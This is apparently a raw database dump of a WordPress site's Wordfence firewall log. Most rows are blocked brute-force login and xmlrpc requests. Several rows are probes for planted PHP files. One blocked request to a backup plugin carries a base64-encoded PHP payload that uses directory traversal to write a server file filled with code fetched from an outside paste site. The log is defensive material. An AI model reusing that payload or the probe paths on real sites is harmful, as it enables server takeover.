Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14402,0.000000,1704613269.224870,'&\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14400,0.000000,1704612445.743617,'\0\0\0\0\0\0\0\0\0\0D8',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14401,0.000000,1704612880.816403,'\0\0\0\0\0\0\0\0\0\0;',0,200,0,1,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','loginFailValidUsername',NULL,NULL),(14397,0.000000,1704611199.590495,'\0\0\0\0\0\0\0\0\0\0`d',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14398,0.000000,1704611641.603672,'\0\0\0\0\0\0\0\0\0\0x\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14399,0.000000,1704612024.196313,'\0\0\0\0\0\0\0\0\0\0qH',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14396,0.000000,1704610774.026595,'\0\0\0\0\0\0\0\0\0\0C',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14394,0.000000,1704610570.302300,'\0\0\0\0\0\0\0\0\0\0i',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14395,0.000000,1704610761.711748,'\0\0\0\0\0\0\0\0\0\0k',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14393,0.000000,1704610365.009327,'\0\0\0\0\0\0\0\0\0\0[',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14392,0.000000,1704610271.252983,'\0\0\0\0\0\0\0\0\0\0! ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14391,0.000000,1704609921.983025,'\0\0\0\0\0\0\0\0\0\0b^',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14390,0.000000,1704609530.467486,'\0\0\0\0\0\0\0\0\0\0K',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14388,0.000000,1704609091.343912,'\0\0\0\0\0\0\0\0\0\0DP',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14389,0.000000,1704609176.356813,'\0\0\0\0\0\0\0\0\0\03',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14387,0.000000,1704608706.828191,'\0\0\0\0\0\0\0\0\0\0gs',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14386,0.000000,1704608254.238487,'\0\0\0\0\0\0\0\0\0\0m?',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14385,0.000000,1704607848.702078,'\0\0\0\0\0\0\0\0\0\0H,',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14384,0.000000,1704607587.272441,'\0\0\0\0\0\0\0\0\0\03',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14383,0.000000,1704607444.491254,'\0\0\0\0\0\0\0\0\0\0Hӱ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14382,0.000000,1704607043.574872,'\0\0\0\0\0\0\0\0\0\0D',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14381,0.000000,1704606627.108987,'\0\0\0\0\0\0\0\0\0\0D',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14380,0.000000,1704606243.691863,'\0\0\0\0\0\0\0\0\0\0D',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14379,0.000000,1704605990.710446,'\0\0\0\0\0\0\0\0\0\0D',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14378,0.000000,1704605826.524175,'\0\0\0\0\0\0\0\0\0\0m?',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14377,0.000000,1704605429.837262,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14376,0.000000,1704605050.998948,'\0\0\0\0\0\0\0\0\0\0H',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14375,0.000000,1704604664.317591,'\0\0\0\0\0\0\0\0\0\0g*',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14374,0.000000,1704604638.625663,'\0\0\0\0\0\0\0\0\0\0.b@',0,200,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0','loginFailInvalidUsername',NULL,NULL),(14373,0.000000,1704604393.052664,'\0\0\0\0\0\0\0\0\0\0[y[',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14372,0.000000,1704604156.248200,'\0\0\0\0\0\0\0\0\0\0g]',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14371,0.000000,1704603653.672149,'\0\0\0\0\0\0\0\0\0\0+',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14370,0.000000,1704603232.307160,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14369,0.000000,1704603038.712847,'\0\0\0\0\0\0\0\0\0\0b^',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/95.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14368,0.000000,1704602791.671895,'\0\0\0\0\0\0\0\0\0\0\0[',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14332,0.000000,1704574485.516029,'\0\0\0\0\0\0\0\0\0\0hP',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14333,0.000000,1704575432.919559,'\0\0\0\0\0\0\0\0\0\0h',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14334,0.000000,1704576339.991401,'\0\0\0\0\0\0\0\0\0\0m~',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14335,1704576635.483264,1704576635.421000,'\0\0\0\0\0\0\0\0\0\0[\\:',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/style.php?sig=rename',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluL3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14348,0.000000,1704585001.100974,'\0\0\0\0\0\0\0\0\0\0@',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14349,0.000000,1704586604.668012,'\0\0\0\0\0\0\0\0\0\0} ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14336,1704576625.706737,1704576625.620500,'\0\0\0\0\0\0\0\0\0\0[\\:',0,403,0,0,0,'https://tummyrevolution.com/wp-content/style.php?sig=rename',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvc3R5bGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14331,1704572294.709246,1704572294.622600,'\0\0\0\0\0\0\0\0\0\0bF9<',0,403,0,0,0,'https://tummyrevolution.com/wp-content/auto_seo.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvYXV0b19zZW8ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(14345,0.000000,1704581806.724733,'\0\0\0\0\0\0\0\0\0\0t>ή',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14346,0.000000,1704581992.489426,'\0\0\0\0\0\0\0\0\0\0N ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14347,0.000000,1704583397.866229,'\0\0\0\0\0\0\0\0\0\0M',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14337,1704576613.753767,1704576613.645400,'\0\0\0\0\0\0\0\0\0\0[\\:',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/style.php?sig=rename',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3N0eWxlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14192,0.000000,1704492754.698020,'\0\0\0\0\0\0\0\0\0\0H',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14330,1704572310.473036,1704572310.369800,'\0\0\0\0\0\0\0\0\0\0bF9<',0,403,0,0,0,'https://tummyrevolution.com/wp-content/inputs.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvaW5wdXRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14193,0.000000,1704494065.566170,'\0\0\0\0\0\0\0\0\0\06|',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14194,0.000000,1704494394.712320,'\0\0\0\0\0\0\0\0\0\0\"A\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14195,0.000000,1704495079.841128,'\0\0\0\0\0\0\0\0\0\0>f',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14196,0.000000,1704496039.384001,'\0\0\0\0\0\0\0\0\0\0Y',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14197,0.000000,1704496950.620822,'\0\0\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14198,0.000000,1704496951.748525,'\0\0\0\0\0\0\0\0\0\0Kw',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14199,0.000000,1704497702.575803,'\0\0\0\0\0\0\0\0\0\0\\?Α',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14200,1704498011.534323,1704498011.432700,'\0\0\0\0\0\0\0\0\0\0+\n',0,403,0,0,0,'https://tummyrevolution.com/wp-22.php?sfilename=ovatools.php&sfilecontent=&supfiles=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLTIyLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(14202,0.000000,1704500162.259956,'\0\0\0\0\0\0\0\0\0\0՘',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14203,1704500787.001340,1704500786.939700,'\0\0\0\0\0\0\0\0\0\0',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/backup-backup/includes/backup-heart.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5ib2R5W29d\",\"paramValue\":\"ZmlsZV9wdXRfY29udGVudHMoIi4uLy4uLy4uLy4uL3dwLXdsdXcucGhwIixmaWxlX2dldF9jb250ZW50cygiaHR0cHM6Ly9yZW50cnkuY28vbTVuN3dlL3JhdyIpKTs=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYWNrdXAtYmFja3VwL2luY2x1ZGVzL2JhY2t1cC1oZWFydC5waHA=\",\"category\":\"traversal\",\"ssl\":1}'),(14201,0.000000,1704499367.715700,'\0\0\0\0\0\0\0\0\0\0%\rQ',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14271,0.000000,1704530761.336636,'\0\0\0\0\0\0\0\0\0\0>f',0,503,0,0,0,'https://tummyrevolution.com/xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14256,1704521688.048044,1704521687.937400,'\0\0\0\0\0\0\0\0\0\0^@x',0,403,0,0,0,'https://tummyrevolution.com/.well-knownold/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3dub2xkLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(14269,0.000000,1704529525.356402,'\0\0\0\0\0\0\0\0\0\0b9',0,503,0,0,0,'https://www.tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14270,0.000000,1704530646.359302,'\0\0\0\0\0\0\0\0\0\0>B',0,200,0,1,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','loginFailValidUsername',NULL,NULL),(14257,1704521670.406295,1704521670.321700,'\0\0\0\0\0\0\0\0\0\0^@x',0,403,0,0,0,'https://tummyrevolution.com/wp-content/plugins/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(14266,0.000000,1704528630.922629,'\0\0\0\0\0\0\0\0\0\0Y{i',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14267,0.000000,1704529034.681933,' A\0$T\0\0\0\0\0\0\0\0',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(14268,0.000000,1704529340.844335,'\0\0\0\0\0\0\0\0\0\0э8',0,200,0,1,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36','loginFailValidUsername',NULL,NULL),(14258,1704521651.207184,1704521651.107800,'\0\0\0\0\0\0\0\0\0\0^@x',0,403,0,0,0,'https://tummyrevolution.com/wp-admin/',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(14264,0.000000,1704525803.454904,'\0\0\0\0\0\0\0\0\0\0ʬ\Z',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (Windows 